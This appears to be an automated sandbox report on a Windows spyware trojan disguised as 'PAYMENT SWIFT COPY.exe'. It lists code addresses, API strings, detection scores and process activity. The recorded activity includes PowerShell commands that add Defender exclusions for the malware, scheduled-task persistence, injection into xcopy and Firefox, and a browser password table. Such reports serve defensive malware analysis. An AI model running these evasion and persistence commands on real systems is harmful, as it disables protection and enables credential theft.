                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06877DCF14_2_06877DCF
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06877DDB14_2_06877DDB
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06898ADB14_2_06898ADB
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_068822FB14_2_068822FB
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06879A7714_2_06879A77
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06879A7B14_2_06879A7B
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_0686E01214_2_0686E012
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F802C015_2_02F802C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA027415_2_02FA0274
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0E3F015_2_02F0E3F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FC03E615_2_02FC03E6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBA35215_2_02FBA352
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9200015_2_02F92000
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB81CC15_2_02FB81CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FC01AA15_2_02FC01AA
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB41A215_2_02FB41A2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F8815815_2_02F88158
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9A11815_2_02F9A118
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EF010015_2_02EF0100
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1C6E015_2_02F1C6E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EFC7C015_2_02EFC7C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0077015_2_02F00770
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F2475015_2_02F24750
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FAE4F615_2_02FAE4F6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB244615_2_02FB2446
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA442015_2_02FA4420
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FC059115_2_02FC0591
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0053515_2_02F00535
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EFEA8015_2_02EFEA80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB6BD715_2_02FB6BD7
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBAB4015_2_02FBAB40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F2E8F015_2_02F2E8F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EE68B815_2_02EE68B8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0A84015_2_02F0A840
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0284015_2_02F02840
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F029A015_2_02F029A0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FCA9A615_2_02FCA9A6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1696215_2_02F16962
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBEEDB15_2_02FBEEDB
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F12E9015_2_02F12E90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBCE9315_2_02FBCE93
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F00E5915_2_02F00E59
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBEE2615_2_02FBEE26
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EF2FC815_2_02EF2FC8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F7EFA015_2_02F7EFA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F74F4015_2_02F74F40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F20F3015_2_02F20F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA2F3015_2_02FA2F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F42F2815_2_02F42F28
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EF0CF215_2_02EF0CF2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA0CB515_2_02FA0CB5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F00C0015_2_02F00C00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EFADE015_2_02EFADE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F18DBF15_2_02F18DBF
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9CD1F15_2_02F9CD1F
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0AD0015_2_02F0AD00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1D2F015_2_02F1D2F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA12ED15_2_02FA12ED
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1B2C015_2_02F1B2C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F052A015_2_02F052A0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F4739A15_2_02F4739A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EED34C15_2_02EED34C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB132D15_2_02FB132D
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB70E915_2_02FB70E9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBF0E015_2_02FBF0E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F070C015_2_02F070C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FAF0CC15_2_02FAF0CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0B1B015_2_02F0B1B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FCB16B15_2_02FCB16B
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EEF17215_2_02EEF172
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F3516C15_2_02F3516C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB16CC15_2_02FB16CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F4563015_2_02F45630
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBF7B015_2_02FBF7B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EF146015_2_02EF1460
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBF43F15_2_02FBF43F
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FC95C315_2_02FC95C3
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9D5B015_2_02F9D5B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB757115_2_02FB7571
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FADAC615_2_02FADAC6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F45AA015_2_02F45AA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9DAAC15_2_02F9DAAC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA1AA315_2_02FA1AA3
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F73A6C15_2_02F73A6C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFA4915_2_02FBFA49
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB7A4615_2_02FB7A46
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F75BF015_2_02F75BF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F3DBF915_2_02F3DBF9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1FB8015_2_02F1FB80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFB7615_2_02FBFB76
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F038E015_2_02F038E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F6D80015_2_02F6D800
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0995015_2_02F09950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1B95015_2_02F1B950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9591015_2_02F95910
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F09EB015_2_02F09EB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EC3FD515_2_02EC3FD5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EC3FD215_2_02EC3FD2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFFB115_2_02FBFFB1
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F01F9215_2_02F01F92
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFF0915_2_02FBFF09
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFCF215_2_02FBFCF2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F79C3215_2_02F79C32
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1FDC015_2_02F1FDC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB7D7315_2_02FB7D73
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB1D5A15_2_02FB1D5A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F03D4015_2_02F03D40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_00531F2015_2_00531F20
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052CD7015_2_0052CD70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052CD6C15_2_0052CD6C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052CF9015_2_0052CF90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052AF8015_2_0052AF80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052B0D015_2_0052B0D0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052B0C415_2_0052B0C4
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052130715_2_00521307
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_005355F015_2_005355F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_005337F015_2_005337F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_005337EC15_2_005337EC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0054BDD015_2_0054BDD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0321E35315_2_0321E353
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0321E23515_2_0321E235
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0321D7B815_2_0321D7B8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0321E6EC15_2_0321E6EC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: String function: 01915130 appears 58 times
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: String function: 0194EA12 appears 86 times
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: String function: 01927E54 appears 107 times
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: String function: 018CB970 appears 262 times
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: String function: 0195F290 appears 103 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 02F35130 appears 58 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 02F6EA12 appears 86 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 02F47E54 appears 107 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 02EEB970 appears 262 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 02F7F290 appears 103 times
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: String function: 01597E54 appears 96 times
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: String function: 015BEA12 appears 36 times
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000000.1677274859.000000000093C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameohAw.exeH vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1724944126.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1733049993.0000000003D18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1733049993.0000000003CF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1733049993.000000000452F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1742073643.0000000007570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1739103302.00000000057B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000019CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXCOPY.EXEj% vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exeBinary or memory string: OriginalFilenameohAw.exeH vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PAYMENT SWIFT COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: NCchtKNKiPqC.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, N13ITUDLcClkUqkPFe.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, N13ITUDLcClkUqkPFe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, N13ITUDLcClkUqkPFe.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, N13ITUDLcClkUqkPFe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, k0D0gf3cPpP3GpvRZo.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, k0D0gf3cPpP3GpvRZo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, k0D0gf3cPpP3GpvRZo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, N13ITUDLcClkUqkPFe.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, N13ITUDLcClkUqkPFe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/16@16/10
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMutant created: \Sessions\1\BaseNamedObjects\cWjcfJdFxKknPktgSyoXfkDLW
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile created: C:\Users\user\AppData\Local\Temp\tmpFA76.tmpJump to behavior
                Source: PAYMENT SWIFT COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PAYMENT SWIFT COPY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: xcopy.exe, 0000000F.00000003.2051311382.000000000299A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4139981371.000000000299A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PAYMENT SWIFT COPY.exeVirustotal: Detection: 22%
                Source: PAYMENT SWIFT COPY.exeReversingLabs: Detection: 27%
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile read: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: amsi.dllJump to behavior
